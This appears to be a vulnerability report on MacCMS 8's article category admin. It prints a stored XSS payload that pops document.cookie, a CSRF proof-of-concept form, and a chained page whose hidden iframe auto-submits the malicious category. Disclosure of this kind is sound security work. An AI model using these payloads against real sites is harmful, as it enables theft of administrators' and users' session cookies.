Description
xss
XSS vulnerability exists in the background administrator article management office when adding and modifying
Where Chinese and English names are entered, enter
" onmousemove=alert(document.cookie) src=x,Following chart

Move the mouse over the label in the background article management area and the administrator cookie will pop up, as shown in the following figure

User cookies will also pop up when the front page mouse moves over the title

csrf
It is found that CSRF exists at the same time of adding and modifying
Before use

When the following page is constructed, the administrator can be induced to click
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST">
<input type="hidden" name="t_id" value="" />
<input type="hidden" name="flag" value="add" />
<input type="hidden" name="backurl" value="http://localhost/maccms8/safetest/index.php?m=art-type" />
<input type="hidden" name="t_pid" value="0" />
<input type="hidden" name="t_name" value="test" onmousemove=alert(document.cookie) src=x" />
<input type="hidden" name="t_enname" value="test" onmousemove=alert(document.cookie) src=x" />
<input type="hidden" name="t_tpl" value="art_type.html" />
<input type="hidden" name="t_tpl_list" value="art_list.html" />
<input type="hidden" name="t_tpl_art" value="art_detail.html" />
<input type="hidden" name="t_key" value="" />
<input type="hidden" name="t_des" value="" />
<input type="hidden" name="t_title" value="" />
<input type="hidden" name="t_sort" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>When the administrator visits the click Page

csrf+xss
Here, CSRF and XSS can be used together, and attackers can use CSRF vulnerability to add or fix code brought in by articles,
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome to CSRF</title>
</head>
<p style="color:blue; text-align:center; font-size:60px;">Your're by CSRF</p>
<body>
<iframe hidden width=1000 heigth=100 src="#" srcdoc='
<form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST" name="form">
<input type="hidden" name="t_id" value="" />
<input type="hidden" name="flag" value="add" />
<input type="hidden" name="backurl" value="http://localhost/maccms8/safetest/index.php?m=art-type" />
<input type="hidden" name="t_pid" value="0" />
<input type="hidden" name="t_name" value="test" onmousemove=alert(document.cookie) src=x" />
<input type="hidden" name="t_enname" value="test" onmousemove=alert(document.cookie) src=x" />
<input type="hidden" name="t_tpl" value="art_type.html" />
<input type="hidden" name="t_tpl_list" value="art_list.html" />
<input type="hidden" name="t_tpl_art" value="art_detail.html" />
<input type="hidden" name="t_key" value="" />
<input type="hidden" name="t_des" value="" />
<input type="hidden" name="t_title" value="" />
<input type="hidden" name="t_sort" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
//Automatic submission
document.form.submit();
</script>
'></iframe>
</body>
</html>After the user accesses the link, the hidden iframe automatically submits the form and successfully adds the article classification with malicious code without the user's knowledge. Malicious code can send the user's cookie to the attacker's remote server and steal the user's cookie or administrator's cookie.

